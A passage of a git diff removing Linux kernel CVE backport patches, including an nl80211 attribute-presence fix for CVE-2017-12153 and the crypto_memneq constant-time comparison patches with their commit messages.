--	return sprintf(buf, "%s\n", pdev->driver_override);
-+	device_lock(dev);
-+	len = sprintf(buf, "%s\n", pdev->driver_override);
-+	device_unlock(dev);
-+	return len;
- }
- static DEVICE_ATTR_RW(driver_override);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-12153/3.2-^3.16/0001.patch b/Patches/Linux_CVEs/CVE-2017-12153/3.2-^3.16/0001.patch
deleted file mode 100644
index 4cc324ad..00000000
--- a/Patches/Linux_CVEs/CVE-2017-12153/3.2-^3.16/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 082d8a6a55d2b6583d9e93ac9796efdf4c412658 Mon Sep 17 00:00:00 2001
-From: Vladis Dronov <vdronov@redhat.com>
-Date: Wed, 13 Sep 2017 00:21:21 +0200
-Subject: nl80211: check for the required netlink attributes presence
-
-commit e785fa0a164aa11001cba931367c7f94ffaff888 upstream.
-
-nl80211_set_rekey_data() does not check if the required attributes
-NL80211_REKEY_DATA_{REPLAY_CTR,KEK,KCK} are present when processing
-NL80211_CMD_SET_REKEY_OFFLOAD request. This request can be issued by
-users with CAP_NET_ADMIN privilege and may result in NULL dereference
-and a system crash. Add a check for the required attributes presence.
-This patch is based on the patch by bo Zhang.
-
-This fixes CVE-2017-12153.
-
-References: https://bugzilla.redhat.com/show_bug.cgi?id=1491046
-Fixes: e5497d766ad ("cfg80211/nl80211: support GTK rekey offload")
-Reported-by: bo Zhang <zhangbo5891001@gmail.com>
-Signed-off-by: Vladis Dronov <vdronov@redhat.com>
-Signed-off-by: Johannes Berg <johannes.berg@intel.com>
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- net/wireless/nl80211.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
-index 19a3c87..41a0ebb 100644
---- a/net/wireless/nl80211.c
-+++ b/net/wireless/nl80211.c
-@@ -5823,6 +5823,9 @@ static int nl80211_set_rekey_data(struct sk_buff *skb, struct genl_info *info)
- 	if (err)
- 		return err;
- 
-+	if (!tb[NL80211_REKEY_DATA_REPLAY_CTR] || !tb[NL80211_REKEY_DATA_KEK] ||
-+	    !tb[NL80211_REKEY_DATA_KCK])
-+		return -EINVAL;
- 	if (nla_len(tb[NL80211_REKEY_DATA_REPLAY_CTR]) != NL80211_REPLAY_CTR_LEN)
- 		return -ERANGE;
- 	if (nla_len(tb[NL80211_REKEY_DATA_KEK]) != NL80211_KEK_LEN)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0001.patch
deleted file mode 100644
index f5f18700..00000000
--- a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0001.patch
+++ /dev/null
@@ -1,371 +0,0 @@
-From 6fef7504fdb639dea2fbc0cbbd10963953f443da Mon Sep 17 00:00:00 2001
-From: James Yonan <james@openvpn.net>
-Date: Thu, 26 Sep 2013 02:20:39 -0600
-Subject: [PATCH] crypto: crypto_memneq - add equality testing of memory
- regions w/o timing leaks
-
-When comparing MAC hashes, AEAD authentication tags, or other hash
-values in the context of authentication or integrity checking, it
-is important not to leak timing information to a potential attacker,
-i.e. when communication happens over a network.
-
-Bytewise memory comparisons (such as memcmp) are usually optimized so
-that they return a nonzero value as soon as a mismatch is found. E.g,
-on x86_64/i5 for 512 bytes this can be ~50 cyc for a full mismatch
-and up to ~850 cyc for a full match (cold). This early-return behavior
-can leak timing information as a side channel, allowing an attacker to
-iteratively guess the correct result.
-
-This patch adds a new method crypto_memneq ("memory not equal to each
-other") to the crypto API that compares memory areas of the same length
-in roughly "constant time" (cache misses could change the timing, but
-since they don't reveal information about the content of the strings
-being compared, they are effectively benign). Iow, best and worst case
-behaviour take the same amount of time to complete (in contrast to
-memcmp).
-
-Note that crypto_memneq (unlike memcmp) can only be used to test for
-equality or inequality, NOT for lexicographical order. This, however,
-is not an issue for its use-cases within the crypto API.
-
-We tried to locate all of the places in the crypto API where memcmp was
-being used for authentication or integrity checking, and convert them
-over to crypto_memneq.
-
-crypto_memneq is declared noinline, placed in its own source file,
-and compiled with optimizations that might increase code size disabled
-("Os") because a smart compiler (or LTO) might notice that the return
-value is always compared against zero/nonzero, and might then
-reintroduce the same early-return optimization that we are trying to
-avoid.
-
-Using #pragma or __attribute__ optimization annotations of the code
-for disabling optimization was avoided as it seems to be considered
-broken or unmaintained for long time in GCC [1]. Therefore, we work
-around that by specifying the compile flag for memneq.o directly in
-the Makefile. We found that this seems to be most appropriate.
-
-As we use ("Os"), this patch also provides a loop-free "fast-path" for
-frequently used 16 byte digests. Similarly to kernel library string
-functions, leave an option for future even further optimized architecture
-specific assembler implementations.
-
-This was a joint work of James Yonan and Daniel Borkmann. Also thanks
-for feedback from Florian Weimer on this and earlier proposals [2].
-
-  [1] http://gcc.gnu.org/ml/gcc/2012-07/msg00211.html
-  [2] https://lkml.org/lkml/2013/2/10/131
-
-Change-Id: Ib2f5b485e28bd274b6d26b945e91acdf3bec8674
-Signed-off-by: James Yonan <james@openvpn.net>
-Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
-Cc: Florian Weimer <fw@deneb.enyo.de>
-Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
----
- crypto/Makefile         |   7 ++-
- crypto/authenc.c        |   6 +--
- crypto/authencesn.c     |   8 +--
- crypto/ccm.c            |   4 +-
- crypto/gcm.c            |   2 +-
- crypto/memneq.c         | 139 ++++++++++++++++++++++++++++++++++++++++++++++++
- include/crypto/algapi.h |  18 ++++++-
- 7 files changed, 172 insertions(+), 12 deletions(-)
- create mode 100644 crypto/memneq.c
-
-diff --git a/crypto/Makefile b/crypto/Makefile
-index 30f33d67533..ae3684d16f3 100644
---- a/crypto/Makefile
-+++ b/crypto/Makefile
-@@ -2,8 +2,13 @@
- # Cryptographic API
- #
- 
-+# memneq MUST be built with -Os or -O0 to prevent early-return optimizations
-+# that will defeat memneq's actual purpose to prevent timing attacks.
-+CFLAGS_REMOVE_memneq.o := -O1 -O2 -O3
-+CFLAGS_memneq.o := -Os
-+
- obj-$(CONFIG_CRYPTO) += crypto.o
--crypto-y := api.o cipher.o compress.o
-+crypto-y := api.o cipher.o compress.o memneq.o
- 
- obj-$(CONFIG_CRYPTO_WORKQUEUE) += crypto_wq.o
- 
-diff --git a/crypto/authenc.c b/crypto/authenc.c
-index 5ef7ba6b6a7..5ea49b331a7 100644
---- a/crypto/authenc.c
-+++ b/crypto/authenc.c
-@@ -188,7 +188,7 @@ static void authenc_verify_ahash_update_done(struct crypto_async_request *areq,
- 	scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen,
- 				 authsize, 0);
- 
--	err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
-+	err = crypto_memneq(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
- 	if (err)
- 		goto out;
- 
-@@ -227,7 +227,7 @@ static void authenc_verify_ahash_done(struct crypto_async_request *areq,
- 	scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen,
- 				 authsize, 0);
- 
--	err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
-+	err = crypto_memneq(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
- 	if (err)
- 		goto out;
- 
-@@ -462,7 +462,7 @@ static int crypto_authenc_verify(struct aead_request *req,
- 	ihash = ohash + authsize;
- 	scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen,
- 				 authsize, 0);
--	return memcmp(ihash, ohash, authsize) ? -EBADMSG : 0;
-+	return crypto_memneq(ihash, ohash, authsize) ? -EBADMSG : 0;
- }
- 
- static int crypto_authenc_iverify(struct aead_request *req, u8 *iv,
-diff --git a/crypto/authencesn.c b/crypto/authencesn.c
-index 136b68b9d8d..9f9a03c0c27 100644
---- a/crypto/authencesn.c
-+++ b/crypto/authencesn.c
-@@ -247,7 +247,7 @@ static void authenc_esn_verify_ahash_update_done(struct crypto_async_request *ar
- 	scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen,
- 				 authsize, 0);
- 
--	err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
-+	err = crypto_memneq(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
- 	if (err)
- 		goto out;
- 
-@@ -296,7 +296,7 @@ static void authenc_esn_verify_ahash_update_done2(struct crypto_async_request *a
- 	scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen,
- 				 authsize, 0);
- 
--	err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
-+	err = crypto_memneq(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
- 	if (err)
- 		goto out;
- 
-@@ -336,7 +336,7 @@ static void authenc_esn_verify_ahash_done(struct crypto_async_request *areq,
- 	scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen,
- 				 authsize, 0);
- 
--	err = memcmp(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
-+	err = crypto_memneq(ihash, ahreq->result, authsize) ? -EBADMSG : 0;
- 	if (err)
- 		goto out;
- 
-@@ -568,7 +568,7 @@ static int crypto_authenc_esn_verify(struct aead_request *req)
- 	ihash = ohash + authsize;
- 	scatterwalk_map_and_copy(ihash, areq_ctx->sg, areq_ctx->cryptlen,
- 				 authsize, 0);
--	return memcmp(ihash, ohash, authsize) ? -EBADMSG : 0;
-+	return crypto_memneq(ihash, ohash, authsize) ? -EBADMSG : 0;
- }
- 
- static int crypto_authenc_esn_iverify(struct aead_request *req, u8 *iv,
-diff --git a/crypto/ccm.c b/crypto/ccm.c
-index 32fe1bb5dec..44fbe81ff2c 100644
---- a/crypto/ccm.c
-+++ b/crypto/ccm.c
-@@ -363,7 +363,7 @@ static void crypto_ccm_decrypt_done(struct crypto_async_request *areq,
- 
- 	if (!err) {
- 		err = crypto_ccm_auth(req, req->dst, cryptlen);
--		if (!err && memcmp(pctx->auth_tag, pctx->odata, authsize))
-+		if (!err && crypto_memneq(pctx->auth_tag, pctx->odata, authsize))
- 			err = -EBADMSG;
- 	}
- 	aead_request_complete(req, err);
-@@ -422,7 +422,7 @@ static int crypto_ccm_decrypt(struct aead_request *req)
- 		return err;
- 
- 	/* verify */
--	if (memcmp(authtag, odata, authsize))
-+	if (crypto_memneq(authtag, odata, authsize))
- 		return -EBADMSG;
- 
- 	return err;
-diff --git a/crypto/gcm.c b/crypto/gcm.c
-index 1a252639ef9..57153f9a1c2 100644
---- a/crypto/gcm.c
-+++ b/crypto/gcm.c
-@@ -575,7 +575,7 @@ static int crypto_gcm_verify(struct aead_request *req,
- 
- 	crypto_xor(auth_tag, iauth_tag, 16);
- 	scatterwalk_map_and_copy(iauth_tag, req->src, cryptlen, authsize, 0);
--	return memcmp(iauth_tag, auth_tag, authsize) ? -EBADMSG : 0;
-+	return crypto_memneq(iauth_tag, auth_tag, authsize) ? -EBADMSG : 0;
- }
- 
- static void gcm_decrypt_done(struct crypto_async_request *areq, int err)
-diff --git a/crypto/memneq.c b/crypto/memneq.c
-new file mode 100644
-index 00000000000..40dfa50d39b
---- /dev/null
-+++ b/crypto/memneq.c
-@@ -0,0 +1,139 @@
-+/*
-+ * Constant-time equality testing of memory regions.
-+ *
-+ * Authors:
-+ *
-+ *   James Yonan <james@openvpn.net>
-+ *   Daniel Borkmann <dborkman@redhat.com>
-+ *
-+ * This file is provided under a dual BSD/GPLv2 license.  When using or
-+ * redistributing this file, you may do so under either license.
-+ *
-+ * GPL LICENSE SUMMARY
-+ *
-+ * Copyright(c) 2013 OpenVPN Technologies, Inc. All rights reserved.
-+ *
-+ * This program is free software; you can redistribute it and/or modify
-+ * it under the terms of version 2 of the GNU General Public License as
-+ * published by the Free Software Foundation.
-+ *
-+ * This program is distributed in the hope that it will be useful, but
-+ * WITHOUT ANY WARRANTY; without even the implied warranty of
-+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+ * General Public License for more details.
-+ *
-+ * You should have received a copy of the GNU General Public License
-+ * along with this program; if not, write to the Free Software
-+ * Foundation, Inc., 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
-+ * The full GNU General Public License is included in this distribution
-+ * in the file called LICENSE.GPL.
-+ *
-+ * BSD LICENSE
-+ *
-+ * Copyright(c) 2013 OpenVPN Technologies, Inc. All rights reserved.
-+ *
-+ * Redistribution and use in source and binary forms, with or without
-+ * modification, are permitted provided that the following conditions
-+ * are met:
-+ *
-+ *   * Redistributions of source code must retain the above copyright
-+ *     notice, this list of conditions and the following disclaimer.
-+ *   * Redistributions in binary form must reproduce the above copyright
-+ *     notice, this list of conditions and the following disclaimer in
-+ *     the documentation and/or other materials provided with the
-+ *     distribution.
-+ *   * Neither the name of OpenVPN Technologies nor the names of its
-+ *     contributors may be used to endorse or promote products derived
-+ *     from this software without specific prior written permission.
-+ *
-+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-+ * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-+ * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-+ * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-+ */
-+
-+#include <crypto/algapi.h>
-+#include <linux/export.h>
-+
-+#ifndef __HAVE_ARCH_CRYPTO_MEMNEQ
-+
-+/* Generic path for arbitrary size */
-+static inline unsigned long
-+__crypto_memneq_generic(const void *a, const void *b, size_t size)
-+{
-+	unsigned long neq = 0;
-+
-+#if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS)
-+	while (size >= sizeof(unsigned long)) {
-+		neq |= *(unsigned long *)a ^ *(unsigned long *)b;
-+		a += sizeof(unsigned long);
-+		b += sizeof(unsigned long);
-+		size -= sizeof(unsigned long);
-+	}
-+#endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */
-+	while (size > 0) {
-+		neq |= *(unsigned char *)a ^ *(unsigned char *)b;
-+		a += 1;
-+		b += 1;
-+		size -= 1;
-+	}
-+	return neq;
-+}
-+
-+/* Loop-free fast-path for frequently used 16-byte size */
-+static inline unsigned long __crypto_memneq_16(const void *a, const void *b)
-+{
-+#ifdef CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS
-+	if (sizeof(unsigned long) == 8)
-+		return ((*(unsigned long *)(a)   ^ *(unsigned long *)(b))
-+		      | (*(unsigned long *)(a+8) ^ *(unsigned long *)(b+8)));
-+	else if (sizeof(unsigned int) == 4)
-+		return ((*(unsigned int *)(a)    ^ *(unsigned int *)(b))
-+                      | (*(unsigned int *)(a+4)  ^ *(unsigned int *)(b+4))
-+		      | (*(unsigned int *)(a+8)  ^ *(unsigned int *)(b+8))
-+	              | (*(unsigned int *)(a+12) ^ *(unsigned int *)(b+12)));
-+	else
-+#endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */
-+		return ((*(unsigned char *)(a)    ^ *(unsigned char *)(b))
-+		      | (*(unsigned char *)(a+1)  ^ *(unsigned char *)(b+1))
-+		      | (*(unsigned char *)(a+2)  ^ *(unsigned char *)(b+2))
-+		      | (*(unsigned char *)(a+3)  ^ *(unsigned char *)(b+3))
-+		      | (*(unsigned char *)(a+4)  ^ *(unsigned char *)(b+4))
-+		      | (*(unsigned char *)(a+5)  ^ *(unsigned char *)(b+5))
-+		      | (*(unsigned char *)(a+6)  ^ *(unsigned char *)(b+6))
-+		      | (*(unsigned char *)(a+7)  ^ *(unsigned char *)(b+7))
-+		      | (*(unsigned char *)(a+8)  ^ *(unsigned char *)(b+8))
-+		      | (*(unsigned char *)(a+9)  ^ *(unsigned char *)(b+9))
-+		      | (*(unsigned char *)(a+10) ^ *(unsigned char *)(b+10))
-+		      | (*(unsigned char *)(a+11) ^ *(unsigned char *)(b+11))
-+		      | (*(unsigned char *)(a+12) ^ *(unsigned char *)(b+12))
-+		      | (*(unsigned char *)(a+13) ^ *(unsigned char *)(b+13))
-+		      | (*(unsigned char *)(a+14) ^ *(unsigned char *)(b+14))
-+		      | (*(unsigned char *)(a+15) ^ *(unsigned char *)(b+15)));
-+}
-+
-+/* Compare two areas of memory without leaking timing information,
-+ * and with special optimizations for common sizes.  Users should
-+ * not call this function directly, but should instead use
-+ * crypto_memneq defined in crypto/algapi.h.
-+ */
-+noinline unsigned long __crypto_memneq(const void *a, const void *b,
-+				       size_t size)
-+{
-+	switch (size) {
-+	case 16:
-+		return __crypto_memneq_16(a, b);
-+	default:
-+		return __crypto_memneq_generic(a, b, size);
-+	}
-+}
-+EXPORT_SYMBOL(__crypto_memneq);
-+
-+#endif /* __HAVE_ARCH_CRYPTO_MEMNEQ */
-diff --git a/include/crypto/algapi.h b/include/crypto/algapi.h
-index 418d270e180..e73c19e90e3 100644
---- a/include/crypto/algapi.h
-+++ b/include/crypto/algapi.h
-@@ -386,5 +386,21 @@ static inline int crypto_requires_sync(u32 type, u32 mask)
- 	return (type ^ CRYPTO_ALG_ASYNC) & mask & CRYPTO_ALG_ASYNC;
- }
- 
--#endif	/* _CRYPTO_ALGAPI_H */
-+noinline unsigned long __crypto_memneq(const void *a, const void *b, size_t size);
-+
-+/**
-+ * crypto_memneq - Compare two areas of memory without leaking
-+ *		   timing information.
-+ *
-+ * @a: One area of memory
-+ * @b: Another area of memory
-+ * @size: The size of the area.
-+ *
-+ * Returns 0 when data is equal, 1 otherwise.
-+ */
-+static inline int crypto_memneq(const void *a, const void *b, size_t size)
-+{
-+	return __crypto_memneq(a, b, size) != 0UL ? 1 : 0;
-+}
- 
-+#endif	/* _CRYPTO_ALGAPI_H */
diff --git a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0002.patch
deleted file mode 100644
index 6334e865..00000000
--- a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0002.patch
+++ /dev/null
@@ -1,214 +0,0 @@
-From a9803a869bfc274d57ab33862ad7a5ea31df4559 Mon Sep 17 00:00:00 2001
-From: Cesar Eduardo Barros <cesarb@cesarb.eti.br>
-Date: Mon, 25 Nov 2013 22:00:41 -0200
-Subject: [PATCH] crypto: more robust crypto_memneq
-
-Disabling compiler optimizations can be fragile, since a new
-optimization could be added to -O0 or -Os that breaks the assumptions
-the code is making.
-
-Instead of disabling compiler optimizations, use a dummy inline assembly
-(based on RELOC_HIDE) to block the problematic kinds of optimization,
-while still allowing other optimizations to be applied to the code.
-
-The dummy inline assembly is added after every OR, and has the
-accumulator variable as its input and output. The compiler is forced to
-assume that the dummy inline assembly could both depend on the
-accumulator variable and change the accumulator variable, so it is
-forced to compute the value correctly before the inline assembly, and
-cannot assume anything about its value after the inline assembly.
-
-This change should be enough to make crypto_memneq work correctly (with
-data-independent timing) even if it is inlined at its call sites. That
-can be done later in a followup patch.
-
-Compile-tested on x86_64.
-
-Change-Id: Ib82641bedec576d2be3793db4d8da36a4ccbbe75
-Signed-off-by: Cesar Eduardo Barros <cesarb@cesarb.eti.br>
-Acked-by: Daniel Borkmann <dborkman@redhat.com>
-Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
----
- crypto/Makefile                |  5 ---
- crypto/memneq.c                | 79 +++++++++++++++++++++++++++++-------------
- include/linux/compiler-gcc.h   |  3 ++
- include/linux/compiler-intel.h |  7 ++++
- include/linux/compiler.h       |  4 +++
- 5 files changed, 68 insertions(+), 30 deletions(-)
-
-diff --git a/crypto/Makefile b/crypto/Makefile
-index ae3684d16f3..4c75316f7d6 100644
---- a/crypto/Makefile
-+++ b/crypto/Makefile
-@@ -2,11 +2,6 @@
- # Cryptographic API
- #
- 
--# memneq MUST be built with -Os or -O0 to prevent early-return optimizations
--# that will defeat memneq's actual purpose to prevent timing attacks.
--CFLAGS_REMOVE_memneq.o := -O1 -O2 -O3
--CFLAGS_memneq.o := -Os
--
- obj-$(CONFIG_CRYPTO) += crypto.o
- crypto-y := api.o cipher.o compress.o memneq.o
- 
-diff --git a/crypto/memneq.c b/crypto/memneq.c
-index 40dfa50d39b..a285a744bc7 100644
---- a/crypto/memneq.c
-+++ b/crypto/memneq.c
-@@ -73,6 +73,7 @@ __crypto_memneq_generic(const void *a, const void *b, size_t size)
- #if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS)
- 	while (size >= sizeof(unsigned long)) {
- 		neq |= *(unsigned long *)a ^ *(unsigned long *)b;
-+		OPTIMIZER_HIDE_VAR(neq);
- 		a += sizeof(unsigned long);
- 		b += sizeof(unsigned long);
- 		size -= sizeof(unsigned long);
-@@ -80,6 +81,7 @@ __crypto_memneq_generic(const void *a, const void *b, size_t size)
- #endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */
- 	while (size > 0) {
- 		neq |= *(unsigned char *)a ^ *(unsigned char *)b;
-+		OPTIMIZER_HIDE_VAR(neq);
- 		a += 1;
- 		b += 1;
- 		size -= 1;
-@@ -90,33 +92,60 @@ __crypto_memneq_generic(const void *a, const void *b, size_t size)
- /* Loop-free fast-path for frequently used 16-byte size */
- static inline unsigned long __crypto_memneq_16(const void *a, const void *b)
- {
-+	unsigned long neq = 0;
-+
- #ifdef CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS
--	if (sizeof(unsigned long) == 8)
--		return ((*(unsigned long *)(a)   ^ *(unsigned long *)(b))
--		      | (*(unsigned long *)(a+8) ^ *(unsigned long *)(b+8)));
--	else if (sizeof(unsigned int) == 4)
--		return ((*(unsigned int *)(a)    ^ *(unsigned int *)(b))
--                      | (*(unsigned int *)(a+4)  ^ *(unsigned int *)(b+4))
--		      | (*(unsigned int *)(a+8)  ^ *(unsigned int *)(b+8))
--	              | (*(unsigned int *)(a+12) ^ *(unsigned int *)(b+12)));
--	else
-+	if (sizeof(unsigned long) == 8) {
-+		neq |= *(unsigned long *)(a)   ^ *(unsigned long *)(b);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned long *)(a+8) ^ *(unsigned long *)(b+8);
-+		OPTIMIZER_HIDE_VAR(neq);
-+	} else if (sizeof(unsigned int) == 4) {
-+		neq |= *(unsigned int *)(a)    ^ *(unsigned int *)(b);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned int *)(a+4)  ^ *(unsigned int *)(b+4);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned int *)(a+8)  ^ *(unsigned int *)(b+8);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned int *)(a+12) ^ *(unsigned int *)(b+12);
-+		OPTIMIZER_HIDE_VAR(neq);
-+	} else {
- #endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */
--		return ((*(unsigned char *)(a)    ^ *(unsigned char *)(b))
--		      | (*(unsigned char *)(a+1)  ^ *(unsigned char *)(b+1))
--		      | (*(unsigned char *)(a+2)  ^ *(unsigned char *)(b+2))
--		      | (*(unsigned char *)(a+3)  ^ *(unsigned char *)(b+3))
--		      | (*(unsigned char *)(a+4)  ^ *(unsigned char *)(b+4))
--		      | (*(unsigned char *)(a+5)  ^ *(unsigned char *)(b+5))
--		      | (*(unsigned char *)(a+6)  ^ *(unsigned char *)(b+6))
--		      | (*(unsigned char *)(a+7)  ^ *(unsigned char *)(b+7))
--		      | (*(unsigned char *)(a+8)  ^ *(unsigned char *)(b+8))
--		      | (*(unsigned char *)(a+9)  ^ *(unsigned char *)(b+9))
--		      | (*(unsigned char *)(a+10) ^ *(unsigned char *)(b+10))
--		      | (*(unsigned char *)(a+11) ^ *(unsigned char *)(b+11))
--		      | (*(unsigned char *)(a+12) ^ *(unsigned char *)(b+12))
--		      | (*(unsigned char *)(a+13) ^ *(unsigned char *)(b+13))
--		      | (*(unsigned char *)(a+14) ^ *(unsigned char *)(b+14))
--		      | (*(unsigned char *)(a+15) ^ *(unsigned char *)(b+15)));
-+		neq |= *(unsigned char *)(a)    ^ *(unsigned char *)(b);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+1)  ^ *(unsigned char *)(b+1);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+2)  ^ *(unsigned char *)(b+2);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+3)  ^ *(unsigned char *)(b+3);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+4)  ^ *(unsigned char *)(b+4);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+5)  ^ *(unsigned char *)(b+5);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+6)  ^ *(unsigned char *)(b+6);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+7)  ^ *(unsigned char *)(b+7);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+8)  ^ *(unsigned char *)(b+8);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+9)  ^ *(unsigned char *)(b+9);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+10) ^ *(unsigned char *)(b+10);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+11) ^ *(unsigned char *)(b+11);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+12) ^ *(unsigned char *)(b+12);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+13) ^ *(unsigned char *)(b+13);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+14) ^ *(unsigned char *)(b+14);
-+		OPTIMIZER_HIDE_VAR(neq);
-+		neq |= *(unsigned char *)(a+15) ^ *(unsigned char *)(b+15);
-+		OPTIMIZER_HIDE_VAR(neq);
-+	}
-+
-+	return neq;
- }
- 
- /* Compare two areas of memory without leaking timing information,
-diff --git a/include/linux/compiler-gcc.h b/include/linux/compiler-gcc.h
-index e5834aa24b9..8c999ad4545 100644
---- a/include/linux/compiler-gcc.h
-+++ b/include/linux/compiler-gcc.h
-@@ -34,6 +34,9 @@
-     __asm__ ("" : "=r"(__ptr) : "0"(ptr));		\
-     (typeof(ptr)) (__ptr + (off)); })
- 
-+/* Make the optimizer believe the variable can be manipulated arbitrarily. */
-+#define OPTIMIZER_HIDE_VAR(var) __asm__ ("" : "=r" (var) : "0" (var))
-+
- #ifdef __CHECKER__
- #define __must_be_array(arr) 0
- #else
-diff --git a/include/linux/compiler-intel.h b/include/linux/compiler-intel.h
-index d8e636e5607..966fa6820d9 100644
---- a/include/linux/compiler-intel.h
-+++ b/include/linux/compiler-intel.h
-@@ -15,6 +15,7 @@
-  */
- #undef barrier
- #undef RELOC_HIDE
-+#undef OPTIMIZER_HIDE_VAR
- 
- #define barrier() __memory_barrier()
- 
-@@ -23,6 +24,12 @@
-      __ptr = (unsigned long) (ptr);				\
-     (typeof(ptr)) (__ptr + (off)); })
- 
-+/* This should act as an optimization barrier on var.
-+ * Given that this compiler does not have inline assembly, a compiler barrier
-+ * is the best we can do.
-+ */
-+#define OPTIMIZER_HIDE_VAR(var) barrier()
-+
- /* Intel ECC compiler doesn't support __builtin_types_compatible_p() */
- #define __must_be_array(a) 0
- 
-diff --git a/include/linux/compiler.h b/include/linux/compiler.h
-index 923d093c9ce..a8ef3ca7af2 100644
---- a/include/linux/compiler.h
-+++ b/include/linux/compiler.h
-@@ -164,6 +164,10 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
-     (typeof(ptr)) (__ptr + (off)); })
- #endif
- 
-+#ifndef OPTIMIZER_HIDE_VAR
-+#define OPTIMIZER_HIDE_VAR(var) barrier()
-+#endif
-+
- #endif /* __KERNEL__ */
- 
- #endif /* __ASSEMBLY__ */
diff --git a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0003.patch
deleted file mode 100644
index 1ec87bd7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0003.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From dc0c59d66b8679dc870c9aa568647d0be71501b7 Mon Sep 17 00:00:00 2001
-From: Daniel Borkmann <dborkman@redhat.com>
-Date: Fri, 6 Dec 2013 00:33:33 +0100
-Subject: [PATCH] crypto: memneq - fix for archs without efficient unaligned
- access
-
-Commit fe8c8a126806 introduced a possible build error for archs
-that do not have CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS set. :/
-Fix this up by bringing else braces outside of the ifdef.
-
